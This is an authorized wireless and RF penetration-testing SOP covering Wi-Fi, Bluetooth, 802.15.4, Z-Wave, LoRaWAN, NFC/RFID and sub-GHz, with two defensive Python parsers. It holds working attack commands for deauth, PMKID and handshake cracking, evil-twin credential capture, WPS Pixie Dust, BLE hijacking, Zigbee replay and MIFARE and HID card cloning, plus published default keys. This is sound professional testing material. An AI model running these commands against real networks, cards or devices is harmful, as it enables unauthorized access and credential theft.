---
type: sop
title: "Wireless & RF Pentesting (Authorized)"
description: "Authorized wireless and software-defined-radio testing across Wi-Fi (WPA2/WPA3/OWE), Bluetooth Classic/BLE, 802.15.4 (Zigbee/Thread/Matter), LoRa/LoRaWAN, NFC/RFID, and sub-GHz with HackRF / RTL-SDR / LimeSDR."
created: 2026-04-26
updated: 2026-04-26
template_version: 2026-04-26
tags: []
---
Authorized environments only. Wireless and RF testing crosses statutory radio-emission lines (FCC Part 15 / CE / national equivalents) before a packet leaves the antenna. Operate on hardware/spectrum you own or have written authorization to exercise. RX-only enumeration of public bands is generally lawful; transmit, replay, deauth, and active jamming have hard legal limits in nearly every jurisdiction. See [[sop-legal-ethics|Legal & Ethics]].
- Overview
- Pre-Engagement & Authorization
- Wi-Fi (IEEE 802.11)
- Bluetooth Classic & BLE
- 802.15.4 — Zigbee, Thread, Matter
- Z-Wave
- LoRa & LoRaWAN
- NFC & RFID
- Sub-GHz & ISM-Band Devices
- Software-Defined Radio Fundamentals
- Common Vulnerabilities
- Evidence Collection
- Reporting
- Tools Reference
- Reference Resources
- Common Pitfalls
- Legal & Ethical Considerations
- Related SOPs
## Overview

Authorized assessment of radio-frequency attack surfaces — Wi-Fi, Bluetooth, 802.15.4 mesh networks, LoRa, NFC/RFID, and arbitrary sub-GHz ISM-band devices. The discipline spans:
- Protocol-layer testing — authentication, key-establishment, replay/relay resistance, downgrade attacks
- Implementation-layer testing — vendor stack bugs, fuzzing, vendor-specific extensions
- Hardware-layer testing — radio firmware (cross-linked to [[sop-firmware-reverse-engineering|Firmware RE]]), side channels, glitch injection on RF SoCs
- Operational testing — coverage / signal leakage / rogue AP detection, OPSEC of operator infrastructure

| Attacker capability | Typical band | Required gear |
|---|---|---|
| Passive eavesdropper (RX-only) | Wi-Fi, BLE adv, LoRa, sub-GHz | Monitor-mode NIC, RTL-SDR / HackRF |
| Active probe / replay | All of the above | TX-capable adapter, HackRF, Flipper Zero |
| Mesh / handshake attacker | WPA2/3, BLE pairing, Zigbee join | Hostapd-WPE, mdk4, btlejack, KillerBee + ApiMote |
| Local-physical attacker | NFC, RFID 125 kHz / 13.56 MHz | Proxmark3, ChameleonMini |
| Long-range / SDR attacker | Anything within antenna gain | LimeSDR / BladeRF / USRP, GNU Radio toolchain |
Wi-Fi (Wi-Fi 6/6E/7 rollout, WPA3 SAE-PT changes), Matter / Thread adoption, and Bluetooth core-spec revisions move quarterly. SDR hardware (HackRF, RTL-SDR, LimeSDR families) and the GNU Radio toolchain are slower-rotating. NFC/RFID and 125-kHz prox-card tradecraft is largely stable. Re-verify [verify 2026-04-26] markers and tool repos at the start of each engagement.
## Pre-Engagement & Authorization

Wireless/RF testing transmits into shared spectrum and may interact with devices not owned by the customer (neighboring tenants' Wi-Fi, public BLE beacons in the building, IoT meters). Without written scope and a controlled test environment (Faraday cage, dedicated channel, sacrificial gear), a single deauth flood or PMKID capture session crosses into FCC Part 15 / Wireless Telegraphy Act 2006 / CFAA / Computer Misuse Act / EU Cybercrime Directive 2013/40/EU territory — see [[sop-legal-ethics|Legal & Ethics]].
- Signed Rules of Engagement enumerates bands, channels, and modulations in scope. "Wi-Fi pentest" without a channel/SSID/BSSID list is too vague — collect MAC-address allow-lists, SSIDs, and frequency ranges in writing.
- Active vs. passive explicitly scoped. RX-only enumeration (passive sniffing of public broadcasts, beacon collection, advertising-channel BLE scan) has very different legal weight than TX (deauth, replay, EAPOL injection, jam) — separate authorization for each.
- Geographic / RF boundary defined. Faraday cage, RF-shielded room, or low-power test bench preferred for any TX work; if testing on a customer site, document the radius of intended emission and the operator's procedure if a non-target device responds.
- Adjacent-tenant / neighbor risk acknowledged. Building-wide Wi-Fi deauth, BLE mass-disconnect, or Zigbee channel jamming inevitably affects other tenants — RoE must call out who has been notified and how complaints are routed.
- Regulatory authority acknowledged in writing: FCC (US), Ofcom (UK), ARCEP (FR), BNetzA (DE), ANATEL (BR), MIC (JP), national telecoms regulator equivalent. Some bands (cellular, public-safety, aviation) require licensed-operator status; these are out of scope for typical pentest engagements unless the customer holds the license.
- Hardware import/export controls reviewed if shipping SDR gear across borders — HackRF / LimeSDR / BladeRF / USRP families have ECCN classifications and may require export licenses for some destinations [verify 2026-04-26].
- Frequency monitoring — if any test step involves transmission in a band that may be in active use by emergency services, aviation, or maritime (sub-GHz, GMRS in US, marine VHF), do not transmit. RX-only.
- Sacrificial / lab gear identified — testing uses dedicated SSIDs, dedicated APs, sacrificial Bluetooth dongles, lab Zigbee coordinators. Operator's daily-driver phone and personal devices stay powered down or out of range during TX work.
- Blue-team coordination confirmed with whoever runs the wireless IDS (Cisco WIPS, Aruba RFProtect, ExtremeWireless AirDefense), the SIEM, and the SOC. Names plus 24/7 contacts captured. Emergency-stop signal agreed.
- RF-shielded enclosure for any TX testing that requires repeatable conditions or that should not leak — desktop Faraday tents (Ramsey STE-3000, 3M shielding bag) are imperfect but adequate for low-power devices; full RF chambers are overkill for most pentest work [verify 2026-04-26].
- Dedicated lab APs — ASUS RT-AX86U, TP-Link AX73, MikroTik hAP ax² and similar consumer hardware reproduce most real-world misconfigurations cheaply; pair with hostapd-WPE for AP-side spoofing rehearsal.
- Lab BLE peripherals — nRF52-DK, nRF52840 dongle, ESP32-C3 / ESP32-S3, Raspberry Pi Pico W. Avoid testing against the operator's wearables.
- Lab Zigbee/Thread/Matter — Silicon Labs EFR32MG24 dev kit, Nordic nRF52840 dongle (Zigbee + Thread), Texas Instruments CC2538/CC1352 launchpads.
- SDR rehearsal — HackRF One + RTL-SDR + lab SMA antenna for any GNU Radio flowgraph that will eventually run in customer-facing scope.
Stand up the evidence pipeline before the first probe-request capture. Capture every RF observation as PCAP with radiotap headers (Wi-Fi), HCI snoop (Bluetooth), or SDR baseband recording (.cfile / .sigmf) at the moment of test — chain-of-custody per [[sop-collection-log|Collection Log]] (UTC timestamps, source antenna, operator handle, SHA-256 of each artifact). Handshake captures, BLE pairing exchanges, and recovered keys are credentials in the evidentiary sense; encrypt at rest, store separately from the report deliverable, and schedule destruction in the engagement letter — OPSEC framing per [[sop-opsec-plan|OPSEC]]. SDR recordings are large (1 Msps × 2 channels × 8 bits ≈ 16 MB/s); plan storage and hash verification accordingly. Defang any IOC that ships in the final write-up (redact MAC addresses to OUI-only or vendor-prefix-only) and route the hand-off through [[sop-reporting-packaging-disclosure|Reporting & Disclosure]].
## Wi-Fi (IEEE 802.11)

| Marketing name | IEEE | Year | Bands | Notes |
|---|---|---|---|---|
| Wi-Fi 4 | 802.11n | 2009 | 2.4 / 5 GHz | MIMO introduction |
| Wi-Fi 5 | 802.11ac | 2013 | 5 GHz | Wave 2 added MU-MIMO |
| Wi-Fi 6 | 802.11ax | 2019 | 2.4 / 5 GHz | OFDMA, target wake time |
| Wi-Fi 6E | 802.11ax | 2020 | + 6 GHz | 6 GHz band requires WPA3 + PMF [verify 2026-04-26] |
| Wi-Fi 7 | 802.11be | 2024 | 2.4 / 5 / 6 GHz | Multi-Link Operation, 320 MHz channels [verify 2026-04-26] |
- Open — no auth; deprecated.
- WEP — broken since 2001 (Fluhrer-Mantin-Shamir); never deploy. Treat as "open" if encountered.
- WPA / WPA2-Personal (PSK) — 4-way handshake derives PTK from PSK + ANonce + SNonce + MAC pair. Capture the handshake (or PMKID — see below) and offline-crack.
- WPA2-Enterprise (802.1X / EAP) — RADIUS-backed. Common EAP methods: EAP-TLS (mutual cert, strongest), PEAP/MSCHAPv2 (weak server-cert validation common, rogue-AP attacks effective), EAP-TTLS (similar exposure to PEAP), EAP-PWD.
- WPA3-Personal (SAE / Dragonfly) — replaces PSK 4-way handshake with Simultaneous Authentication of Equals; resistant to offline dictionary attack on the handshake itself but vulnerable to side-channel timing variants (Dragonblood: CVE-2019-9494/9495/9496/9497/9498/9499 [verify 2026-04-26]) and to downgrade if WPA2 transition mode is enabled.
- WPA3-Enterprise — same EAP methods as WPA2-Enterprise plus 192-bit Suite-B option.
- OWE (Opportunistic Wireless Encryption) — RFC 8110; replaces "Open" with unauthenticated Diffie-Hellman; protects against passive eavesdropping on truly open networks. No mutual authentication.
- PMF (Protected Management Frames, 802.11w) — required in WPA3, optional in WPA2. PMF blocks classic deauth/disassoc attacks on associated stations; check the MFPC (capable) and MFPR (required) bits in the RSN Capabilities field of the beacon's RSN information element.
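Added example, not part of the original SOP: a small Python parser for the RSN information element that turns the beacon bytes into the findings listed above (WPA3 transition mode, PMF capable/required, legacy ciphers). It walks the beacon's tagged parameters to find element ID 48, decodes the cipher and AKM suite selectors under the IEEE OUI 00-0F-AC, and reads the MFPC/MFPR capability bits. The three sample IEs and the tagged-parameter blob are constructed for the example, not captured from any network.

```python
import struct

RSN_ELEMENT_ID = 48               # IEEE 802.11 element ID of the RSN information element
IEEE_OUI = bytes.fromhex("000fac")

# Suite selector types under OUI 00-0F-AC (IEEE 802.11 cipher-suite and AKM-suite tables)
CIPHER_SUITES = {1: "WEP-40", 2: "TKIP", 4: "CCMP-128", 5: "WEP-104",
                 6: "BIP-CMAC-128", 8: "GCMP-128", 9: "GCMP-256", 10: "CCMP-256"}
AKM_SUITES = {1: "802.1X", 2: "PSK", 3: "FT-802.1X", 4: "FT-PSK", 5: "802.1X-SHA256",
              6: "PSK-SHA256", 8: "SAE", 9: "FT-SAE", 12: "802.1X-SuiteB-192", 18: "OWE"}
MFPR_BIT = 0x0040                 # RSN Capabilities bit 6: Management Frame Protection Required
MFPC_BIT = 0x0080                 # RSN Capabilities bit 7: Management Frame Protection Capable


def find_rsn_ie(tagged):
    """Walk the tagged-parameter TLVs of a beacon/probe-response body and return the RSN IE, or None."""
    off = 0
    while off + 2 <= len(tagged):
        eid, length = tagged[off], tagged[off + 1]
        if off + 2 + length > len(tagged):
            break                 # truncated frame: stop rather than read past the buffer
        if eid == RSN_ELEMENT_ID:
            return tagged[off:off + 2 + length]
        off += 2 + length
    return None


def _suite(sel, table):
    if sel[:3] != IEEE_OUI:
        return "vendor:" + sel.hex()
    return table.get(sel[3], "unknown-%d" % sel[3])


def parse_rsn_ie(ie):
    """Decode version, ciphers, AKMs and the MFPC/MFPR bits of one RSN IE.
    The spec lets the element end early; absent fields are reported as None/empty."""
    if len(ie) < 4 or ie[0] != RSN_ELEMENT_ID or len(ie) != 2 + ie[1]:
        raise ValueError("not a well-formed RSN IE")
    body = ie[2:]
    info = {"version": struct.unpack_from("<H", body, 0)[0], "group": None,
            "pairwise": [], "akm": [], "mfpc": False, "mfpr": False}
    off = 2
    if off + 4 > len(body):
        return info
    info["group"] = _suite(body[off:off + 4], CIPHER_SUITES)
    off += 4
    for key, table in (("pairwise", CIPHER_SUITES), ("akm", AKM_SUITES)):
        if off + 2 > len(body):
            return info
        count = struct.unpack_from("<H", body, off)[0]
        off += 2
        if off + 4 * count > len(body):
            raise ValueError("suite list count exceeds element length")
        info[key] = [_suite(body[off + 4 * i:off + 4 * i + 4], table) for i in range(count)]
        off += 4 * count
    if off + 2 <= len(body):
        caps = struct.unpack_from("<H", body, off)[0]
        info["mfpc"] = bool(caps & MFPC_BIT)
        info["mfpr"] = bool(caps & MFPR_BIT)
    return info


def assess(info):
    """Findings a wireless assessment raises from the parsed IE (mirrors the SOP's severity list)."""
    findings = []
    akm = set(info["akm"])
    ciphers = set(info["pairwise"]) | {info["group"]}
    if "SAE" in akm and akm & {"PSK", "PSK-SHA256", "FT-PSK"}:
        findings.append("WPA3 transition mode: PSK AKM still offered, downgrade to WPA2 possible")
    if not info["mfpc"]:
        findings.append("PMF not supported: deauth/disassoc injection affects every client")
    elif not info["mfpr"]:
        findings.append("PMF optional: clients that do not negotiate PMF stay exposed to deauth")
    if ciphers & {"TKIP", "WEP-40", "WEP-104"}:
        findings.append("legacy cipher (TKIP/WEP) still permitted")
    return findings


# Constructed sample IEs (not captured from any real network)
WPA2_PSK_IE = bytes.fromhex("3014 0100 000fac04 0100 000fac04 0100 000fac02 0000")
TRANSITION_IE = bytes.fromhex("3018 0100 000fac04 0100 000fac04 0200 000fac02 000fac08 8000")
WPA3_ONLY_IE = bytes.fromhex("3014 0100 000fac04 0100 000fac04 0100 000fac08 c000")
# Constructed tagged-parameter blob: SSID "lab", DS Parameter Set (channel 6), then the RSN IE
SAMPLE_TAGGED = bytes.fromhex("0003 6c6162 0301 06") + TRANSITION_IE

if __name__ == "__main__":
    for label, ie in (("WPA2-PSK", WPA2_PSK_IE), ("WPA3 transition", TRANSITION_IE), ("WPA3-only", WPA3_ONLY_IE)):
        info = parse_rsn_ie(ie)
        print(label, info["akm"], "MFPC=%s MFPR=%s" % (info["mfpc"], info["mfpr"]), assess(info) or "no findings")
    print("from beacon:", parse_rsn_ie(find_rsn_ie(SAMPLE_TAGGED))["akm"])
```

Feed `find_rsn_ie()` the tagged-parameter portion of a beacon pulled from the survey PCAP (everything after the fixed 12-byte beacon header) and the output maps directly onto the "WPA3 transition mode" and "PMF disabled" findings in the reporting section.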
```bash
# Identify a monitor-mode-capable interface (mt7612u, mt7921u, rt3070, ar9271, rtl8812au are common hits;
# check current support: `iw list` shows "monitor" under "Supported interface modes")
iw dev
iw list | grep -A8 'Supported interface modes' | head -20
# Enable monitor mode on wlan0 — preferred via airmon-ng (or iw, after stopping NetworkManager)
sudo airmon-ng check kill      # disable NetworkManager / wpa_supplicant interference
sudo airmon-ng start wlan0     # creates wlan0mon
# Survey on 2.4 / 5 / 6 GHz (6 GHz requires Wi-Fi 6E hardware + recent kernel + regdom set to a 6E-allowed region)
sudo iw reg set US             # or appropriate domain
sudo airodump-ng wlan0mon --band abg   # hop the 2.4 + 5 GHz (a/b/g) channels
sudo airodump-ng wlan0mon --band 6     # 6 GHz (Wi-Fi 6E); needs an airodump-ng build with 6 GHz support [verify 2026-04-26]
# Kismet — long-running surveys with GPS, channel hopping, plugin ecosystem
# https://www.kismetwireless.net/
sudo kismet -c wlan0mon
# wifite — automated wrapper around aircrack-ng / hcxdumptool / hashcat
# https://github.com/derv82/wifite2
sudo wifite --kill --pmkid --no-wps    # passive PMKID first, no active WPS pin attempts
```

```bash
# Channel-locked capture with airodump
sudo airodump-ng wlan0mon -c <channel> --bssid <BSSID> -w capture
# Targeted deauth (PMF must NOT be enforced; check the RSN capabilities in the beacon)
sudo aireplay-ng --deauth 5 -a <BSSID> -c <client-MAC> wlan0mon
# PMKID capture — no client interaction needed when the AP includes a PMKID in the 1st EAPOL message (Steube, 2018)
# https://github.com/ZerBea/hcxdumptool
# (flags below are the pre-6.3 CLI; hcxdumptool 6.3+ reworked its options, check `hcxdumptool -h` [verify 2026-04-26])
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=15
# Convert to hashcat format
hcxpcapngtool -o hash.hc22000 -E essid.txt pmkid.pcapng
# Crack WPA/WPA2 PSK (4-way handshake or PMKID)
hashcat -m 22000 hash.hc22000 wordlist.txt -r rules/best64.rule
# WPA3 SAE — only the WPA2 side of a transition-mode network yields a hash-mode-22000 capture; uncompromised SAE
# offers no offline dictionary attack, so the targets are downgrade-to-WPA2 transition mode + Dragonblood timing leaks
```

```bash
# hostapd-WPE — modified hostapd with EAP credential capture
# https://github.com/OpenSecurityResearch/hostapd-wpe
sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
# eaphammer — automation around hostapd-wpe + karma + GTC downgrade
# https://github.com/s0lst1c3/eaphammer
sudo eaphammer --bssid <bssid> --essid <victim-ssid> --channel 6 --auth wpa-eap --creds
# Wi-Fi Pineapple (Hak5 commercial) — pre-built evil-twin/karma platform
# https://shop.hak5.org/products/wifi-pineapple
# ESP32 Marauder (open-source ESP32 firmware)
# https://github.com/justcallmekoko/ESP32Marauder
```

- Stand up a rogue AP with the same SSID and a mismatched but plausible certificate (or the real certificate if it has leaked).
- Force the client to associate (deauth plus signal-strength preference, or wait for roaming).
- Capture the EAP exchange with hostapd-WPE — output for PEAP/MSCHAPv2 is hash mode 5500 (NetNTLMv1); other EAP modes map to 27200 / 25400.
- Crack offline with hashcat or wait — many MSCHAPv2 captures crack in seconds with a leaked-DES-key approach (asleap historically).

Mitigations to test for:
- Server certificate validation enforced (CA pinning, no "trust any cert from any RADIUS").
- EAP-TLS (mutual cert) instead of PEAP/MSCHAPv2.
- PMF required, not optional.

- WPS PIN brute force (Reaver / Bully) — most modern APs lock WPS after N failed attempts; some still don't [verify 2026-04-26].
- Pixie Dust (Dominique Bongard, 2014) — offline attack against weak WPS PRNG implementations (Ralink, Realtek, Broadcom).
- Recommend disabling WPS entirely; verify via the WPS IE in the beacon.

```bash
# Reaver
sudo reaver -i wlan0mon -b <BSSID> -vv -K   # -K = Pixie Dust (pixiewps)
# Bully (Reaver successor / parallel implementation)
sudo bully wlan0mon -b <BSSID> -d           # -d = Pixie Dust via pixiewps; bully reports the AP's WPS lock state in its output
```

## Bluetooth Classic & BLE

Bluetooth Core Spec is currently 5.4 (Feb 2023); 5.3 (2021) added LE Channel Sounding precursors and Encrypted Advertising Data; BLE-only stacks dominate IoT [verify 2026-04-26].
Bluetooth Classic (BR/EDR) pairing modes:
- Legacy Pairing (pre-2.1) — PIN-based, broken by Shaked-Wool 2005. Should not exist on modern devices.
- Secure Simple Pairing (SSP) — 2.1+, four association models: Just Works, Numeric Comparison, Passkey Entry, Out-of-Band.
- Secure Connections (4.1+) — adds FIPS-approved P-256 ECDH; mandatory in 4.2+ Secure Connections Only mode.
BLE pairing modes (LE Legacy and LE Secure Connections):
- LE Legacy — uses TK (temp key); offline-crackable if Just Works or 6-digit Passkey captured (crackle).
- LE Secure Connections (4.2+) — P-256 ECDH; immune to crackle-style offline attacks.
- KNOB (CVE-2019-9506) — entropy-downgrade in BR/EDR key negotiation; mitigated in 5.1.
- BIAS (CVE-2020-10135) — impersonation via fall-back to Legacy Authentication.
- BLURtooth (CVE-2020-15802) — Cross-Transport Key Derivation overwrite.
- BLESA (Carnegie Mellon, 2020) — reconnection authentication bypass on BLE LL.
- BlueBorne (Armis, 2017, CVE-2017-1000251 et al.) — Linux/Android/iOS RCE via BNEP / SDP. Patched in mainline; legacy embedded devices still exposed.
- BrakTooth (Singapore U Tech & Design, 2021) — 16+ CVEs in BR/EDR stacks.
Patch-state of these CVEs varies wildly across vendors; firmware-RE the target stack to confirm rather than trusting marketing.
```bash
# bluetoothctl — userspace, BlueZ-backed
bluetoothctl
> power on
> scan on                        # active scan; passive option below for RX-only
# hcitool — legacy but still useful for inquiry
sudo hcitool scan                # BR/EDR inquiry
sudo hcitool lescan              # BLE advertising scan (active)
sudo hcitool lescan --passive    # purely RX
# btmgmt for advanced setup (BlueZ 5.x)
sudo btmgmt --index 0 power on
sudo btmgmt --index 0 le on
# btmon — HCI snoop log capture (host-side); open the file in Wireshark
sudo btmon -w bluetooth.btsnoop  # captures HCI events; adapter-dependent visibility into LL/PHY
# Sniffle (NCC Group / Sultan Qasim Khan) — TI CC1352 / CC26x2-based BLE 5 sniffer
# https://github.com/nccgroup/Sniffle
python3 sniff_receiver.py -s /dev/ttyACM0 -c 37 -o adv.pcap   # advertising channel 37, write pcap
python3 sniff_receiver.py -s /dev/ttyACM0 -l                  # -l = long-range (coded PHY) primary advertising
# nRF Sniffer for Bluetooth LE (Nordic + Wireshark plugin) — nRF52840 dongle
# https://www.nordicsemi.com/Products/Development-tools/nrf-sniffer-for-bluetooth-le
```

```bash
# Enumerate services / characteristics on a BLE peripheral
bluetoothctl
> connect <addr>
> menu gatt
> list-attributes
> select-attribute <attr-path>   # pick a characteristic from list-attributes
> read
> write "0x..."
# gatttool (deprecated but functional)
sudo gatttool -b <addr> -I
> connect
> primary
> characteristics
# bleak (Python, cross-platform — Linux/macOS/Windows): BLE scan from Python
# https://github.com/hbldh/bleak
python3 -c 'import asyncio, bleak; [print(d) for d in asyncio.run(bleak.BleakScanner.discover())]'
```

```bash
# btlejack (Damien Cauquil) — BLE 4.x sniffing + connection hijack
# https://github.com/virtualabs/btlejack
btlejack -d /dev/ttyACM0 -s                 # passive scan for existing connections
btlejack -d /dev/ttyACM0 -f <access-addr>   # follow an existing connection by access address
# crackle — LE Legacy Pairing TK recovery (Just Works / 6-digit passkey)
# https://github.com/mikeryan/crackle
crackle -i pairing.pcap -o decrypted.pcap
# mirage — BLE/Zigbee/SPI/UART unified attack framework (RCSL)
# https://github.com/RCayre/mirage
mirage ble_master TARGET=<addr>
```

## 802.15.4 — Zigbee, Thread, Matter

- IEEE 802.15.4 — PHY/MAC. 2.4 GHz channels 11-26, 868/915 MHz sub-GHz channels.
- Zigbee 3.0 — application layer over 802.15.4. Touchlink commissioning historically weak (Zllbruteforce / Z-Shave 2017 [verify 2026-04-26]).
- Zigbee Green Power (ZGP) — energy-harvesting one-way frames; replay-vulnerable if not signed.
- Thread (Thread Group, 2014+) — IPv6 mesh over 802.15.4 with DTLS-PSK commissioning; basis for Matter.
- Matter (Connectivity Standards Alliance, 2022+; was "Project CHIP") — application layer over Wi-Fi or Thread; uses Matter Fabric ID + Node Operational Certificates [verify 2026-04-26].
- Z-Wave — separate (next section); not 802.15.4.
```bash
# KillerBee (River Loop Security) — Python framework for 802.15.4 sniffing/injection
# https://github.com/riverloopsec/killerbee
zbid                         # list attached 802.15.4 radios
zbdump -f 15 -w cap.pcap     # capture on channel 15
zbreplay -f 15 -r cap.pcap   # replay a capture (authorized lab only)
# ApiMote / Atmel RZUSBstick / Texas Instruments CC2531 USB stick — common KillerBee-supported radios
# Z3sec / Zigator — newer 802.15.4 / Zigbee research tooling [verify 2026-04-26]
# Wireshark — IEEE 802.15.4 + Zigbee + Thread dissectors built in (configure decryption keys)
```

- Default / hard-coded Trust Center Link Key (`5A 69 67 42 65 65 41 6C 6C 69 61 6E 63 65 30 39` — "ZigBeeAlliance09") still used during legacy join.
- Touchlink commissioning enabled with default master key (legacy Zigbee Light Link).
- Thread commissioner credentials (PSK_c) cached / left enabled past the commissioning window.
- Matter "Pairing Code" (passcode) reused across deployments rather than per-device unique codes.
## Z-Wave

Z-Wave (Silicon Labs / Zensys lineage) operates in regional sub-GHz bands (US: 908.42 MHz, EU: 868.42 MHz [verify 2026-04-26]). Modern Z-Wave (S2 security framework, mandated for Z-Wave-Plus-V2 certified devices since 2017) uses ECDH key exchange (Curve25519) and AES-128 CCM. Legacy S0 had a known issue (EZ-Wave / Z-Shave 2017) where the network key could be intercepted during inclusion if downgrade was permitted [verify 2026-04-26].
```bash
# EZ-Wave (Joshua Wright et al.) — SDR-based Z-Wave research toolkit
# https://github.com/cureHsu/EZ-Wave [verify 2026-04-26 — original repo URL has moved]
# Aeotec Z-Stick / UZB / Zooz — production Z-Wave controllers; useful as legitimate test coordinators
# Use Silicon Labs PC Controller or Z-Way for inclusion-traffic capture in controlled environments
```

## LoRa & LoRaWAN

- LoRa — Semtech proprietary chirp-spread-spectrum PHY/modulation (sub-GHz, region-specific bands: US 902-928 MHz, EU 863-870 MHz, AS 920-925 MHz).
- LoRaWAN — LoRa Alliance MAC layer over LoRa PHY. Versions 1.0.x and 1.1 are the field-deployed flavors [verify 2026-04-26]. 1.1 added separate AppSKey / NwkSKey with key-rollover semantics; 1.0.x reuses single AppKey.
- Activation modes: OTAA (Over-The-Air Activation, dynamic session keys, preferred) vs ABP (Activation By Personalization, hard-coded session keys, weaker — ABP devices that forget frame counters become replay-vulnerable).
- ABP-only deployments with hard-coded NwkSKey + AppSKey baked into firmware — extract via [[sop-firmware-reverse-engineering|Firmware RE]] and decrypt all uplinks/downlinks.
- AppKey / network-server credentials reused across an entire fleet (single firmware image, no per-device provisioning).
- LoRaWAN 1.0.x deployments with frame-counter reset tolerance (default behavior in some network servers) → replay window.
- LoRa raw (no LoRaWAN MAC) point-to-point links with no authentication — common in hobbyist / Meshtastic setups; not a finding per se but worth flagging in scope.
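Added example, not part of the original SOP: a network-server-side frame-counter check in Python that shows why the LoRaWAN 1.0.x findings above matter. The server reconstructs the 32-bit uplink counter from the 16-bit FCnt in the FHDR and must reject any frame that does not advance it; the `relax_reset=True` policy reproduces the "accept a counter reset" behaviour some servers expose for ABP devices that lose their counter on reboot, which is exactly the replay window the SOP flags. The class name, the policy flag and the uplink sequence are assumptions made for this example; the 16,384 gap limit is the LoRaWAN 1.0.x MAX_FCNT_GAP.

```python
MAX_FCNT_GAP = 16_384   # LoRaWAN 1.0.x MAX_FCNT_GAP: larger jumps mean lost sync and are rejected


class UplinkFrameCounter:
    """Validate the 16-bit FCnt of each uplink against the server's 32-bit counter.
    Frames that do not move the counter forward are replays (or a device out of sync).
    relax_reset=True models the weak server option that accepts a counter reset."""

    def __init__(self, relax_reset=False):
        self.relax_reset = relax_reset
        self.last = None                  # last accepted 32-bit uplink counter

    def accept(self, fcnt16):
        """Return (accepted, reason); state is updated only when the frame is accepted."""
        if not 0 <= fcnt16 <= 0xFFFF:
            raise ValueError("FCnt in the FHDR is 16 bits")
        if self.last is None:             # first uplink after session start
            self.last = fcnt16
            return True, "first-frame"
        candidate = (self.last & 0xFFFF0000) | fcnt16
        if candidate <= self.last:        # 16-bit value wrapped: assume one rollover of the high half
            candidate += 0x10000
        if candidate - self.last <= MAX_FCNT_GAP:
            self.last = candidate
            return True, "ok"
        if self.relax_reset:              # vulnerable policy: treat the jump as a device reboot
            self.last = fcnt16
            return True, "reset-accepted"
        return False, "replay-or-desync"


def run_policy(relax_reset, uplinks):
    """Apply one policy to a sequence of FCnt values and return the (accepted, reason) list."""
    tracker = UplinkFrameCounter(relax_reset=relax_reset)
    return [tracker.accept(f) for f in uplinks]


if __name__ == "__main__":
    # Constructed uplink sequence: three live frames, a device reboot (FCnt back to 0),
    # then an attacker replaying the earlier frame with FCnt 2
    uplinks = [1, 2, 3, 0, 2]
    for relax in (False, True):
        print("relax_reset=%s:" % relax, run_policy(relax, uplinks))
```

Under the strict policy the reboot frame and the replayed frame are both rejected (the device has to rejoin, which is why OTAA is preferred); under the relaxed policy the reset is accepted and the replayed frame with FCnt 2 sails through.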
```bash
# LoRa-PHY decoding via SDR — gr-lora (rpp0)
# https://github.com/rpp0/gr-lora
# Demodulates LoRa chirps to bytes; pair with the Wireshark LoRaWAN dissector
# gr-lora_sdr (Tapparel, EPFL) — alternative GNU Radio out-of-tree module
# https://github.com/tapparelj/gr-lora_sdr [verify 2026-04-26]
# ChirpStack — open-source LoRaWAN network server; useful for lab infrastructure
# https://www.chirpstack.io/
# Heltec / TTGO / Adafruit Feather LoRa boards — cheap test endpoints
```

## NFC & RFID

| Band | Standard | Typical use | Common attack notes |
|---|---|---|---|
| 125 kHz | EM4100 / HID Prox | Legacy access control | No crypto; clone with Proxmark3 in seconds |
| 13.56 MHz | ISO 14443A | MIFARE Classic / DESFire | Classic broken (Crapto1 / mfoc / mfcuk); DESFire EV1+ strong if configured right |
| 13.56 MHz | ISO 14443B | Some ePassports, some access | |
| 13.56 MHz | ISO 15693 | iCLASS / ICODE / library tags | iCLASS Standard / SE has known issues; Elite is strong [verify 2026-04-26] |
| 13.56 MHz | ISO 18092 (NFC) | Smartphones, payment | Tokenization on payment side; relay-attack research active |
```bash
# Proxmark3 (Iceman fork — actively maintained)
# https://github.com/RfidResearchGroup/proxmark3
proxmark3 /dev/ttyACM0
> hf 14a info          # 13.56 MHz card identify
> hf mf info           # MIFARE Classic info
> hf mf autopwn        # automated MIFARE Classic key recovery + dump
> lf hid read          # 125 kHz HID Prox read (`lf hid reader` in current Iceman builds)
> lf hid clone <id>    # clone to T5577 / EM4305 blank
# ChameleonMini / ChameleonUltra — card-emulation device
# https://github.com/emsec/ChameleonMini
# https://github.com/RfidResearchGroup/ChameleonUltra
# Flipper Zero — consumer-grade multi-protocol tool (125 kHz, 13.56 MHz, sub-GHz, IR, BLE, NFC)
# https://flipperzero.one/
# Note: regulatory and policy posture varies — some carriers / countries restrict sub-GHz TX
# libnfc (Linux NFC stack) — for ACR122U and similar PC/SC readers
# https://github.com/nfc-tools/libnfc
nfc-list
mfoc -P 500 -O dump.mfd                # MIFARE Classic nested attack; needs one known (often default) key
mfcuk -C -R 0:A -s 250 -S 250 -v 2     # darkside attack on the reader nonces when no key is known
```

- Site uses MIFARE Classic 1K / 4K with default keys (`A0A1A2A3A4A5`, `D3F7D3F7D3F7`, etc.) or keys recovered via mfoc/mfcuk.
- Site uses 125 kHz HID Prox with no rolling code → clone-and-replay trivial.
- iCLASS Legacy / Standard with default master keys (HID published; readers shipped with shared default).
- Mixed-tier deployments where high-security doors fall back to legacy on read failure.
- Mobile-credential (HID Mobile Access, Nedap MACE) deployments without device-binding — relay-attack prone.
## Sub-GHz & ISM-Band Devices

Garage-door openers, smart thermostats, weather stations, key-fob remotes, alarm sensors, and industrial telemetry frequently use 315 / 433.92 / 868 / 915 MHz with proprietary modulation (ASK/OOK, FSK). Many are unauthenticated or use fixed-code rolling-code algorithms with known weaknesses.
```bash
# Universal Radio Hacker (URH) — point-and-click protocol RE for unknown sub-GHz signals
# https://github.com/jopohl/urh
urh
# Inspectrum — visual inspection of .cfile / .cu8 SDR captures
# https://github.com/miek/inspectrum
inspectrum capture.cu8
# rtl_433 — known-protocol decoder for 433/868/915 MHz sensors (weather, tire-pressure, energy meters)
# https://github.com/merbanan/rtl_433
rtl_433 -f 433.92M
# RfCat (Atlas Of Doom) — Yard Stick One firmware framework for sub-GHz TX/RX research
# https://github.com/atlas0fd00m/rfcat
```

- Fixed-code remotes (older garage doors, gate openers) — record once, replay.
- Rolling-code with weak PRNG (some KeeLoq deployments) — Bohli et al. 2008, Eisenbarth et al. 2008 attacks.
- Tire-Pressure Monitoring System (TPMS) broadcasts unencrypted on 315/433 MHz — vehicle-tracking research (Ishtiaq Rouf et al., 2010).
- Smart-meter telemetry (some FCC Part 15 / wMBus C-mode deployments) — encryption optional in older deployments.
## Software-Defined Radio Fundamentals

